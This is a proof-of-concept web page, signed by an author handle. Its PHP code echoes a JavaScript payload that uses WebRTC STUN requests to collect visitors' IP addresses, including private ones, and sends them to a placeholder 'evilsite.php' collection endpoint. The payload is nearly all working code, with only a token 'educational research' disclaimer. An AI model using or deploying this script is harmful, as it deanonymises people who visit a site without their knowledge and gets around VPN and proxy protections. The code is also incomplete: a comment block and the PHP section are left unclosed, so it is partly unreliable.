*// PoC by SleepTheGod Twitter.com/ClumsyLulz
<!DOCTYPE html>
<html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    </head>
    <body>

        <?php
        error_reporting(0);
        set_time_limit(0);
        ini_set('display_errors', 0);
        ini_set('max_execution_time', 0);

        /*
        $exploit = "
        <script type='text/javascript'>
            httpGet('http://localhost/evilsite.php?IP=[ IP START ]') // For educational research only skids
            //get the IP addresses associated with an account

            var ip2 = '';
            function getIPs(callback) {
                var ip_dups = {};

                //compatibility for firefox and chrome
                var RTCPeerConnection = window.RTCPeerConnection
                        || window.mozRTCPeerConnection
                        || window.webkitRTCPeerConnection;
                var mediaConstraints = {
                    optional: [{RtpDataChannels: true}]
                };

                //firefox already has a default stun server in about:config
                //    media.peerconnection.default_iceservers =
                //    [{'url': 'stun:stun.services.mozilla.com'}]
                var servers = undefined;

                //add same stun server for chrome
                if (window.webkitRTCPeerConnection)
                    servers = {iceServers: [{urls: 'stun:stun.services.mozilla.com'}]};

                //construct a new RTCPeerConnection
                var pc = new RTCPeerConnection(servers, mediaConstraints);

                //listen for candidate events
                pc.onicecandidate = function(ice) {

                    //skip non-candidate events
                    if (ice.candidate) {

                        //match just the IP address
                        var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
                        var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];

                        //remove duplicates
                        if (ip_dups[ip_addr] === undefined)
                            callback(ip_addr);

                        ip_dups[ip_addr] = true;
                    }
                };

                //create a bogus data channel
                pc.createDataChannel('');

                //create an offer sdp
                pc.createOffer(function(result) {

                    //trigger the stun server request
                    pc.setLocalDescription(result, function() {
                    }, function() {
                    });

                }, function() {
                });
            }

            //insert IP addresses into the page
            getIPs(function(ip) {
                envior(ip); //SUB PROCESSO
            }
            );
            
            //ENVIO GET
            function httpGet(url)
            {
                var xmlHttp = null;

                xmlHttp = new XMLHttpRequest();
                xmlHttp.open('GET', url, false);
                xmlHttp.send(null);
                return xmlHttp.responseText;
            }
            
            function envior(valor) {
                ip2 = ' - ' + valor.toString();
                document.write(httpGet('http://localhost/evilsite.php?IP=' + ip2)); //SleepTheGod was here
		//We out here cuz
            }
            </script>";

        echo $exploit;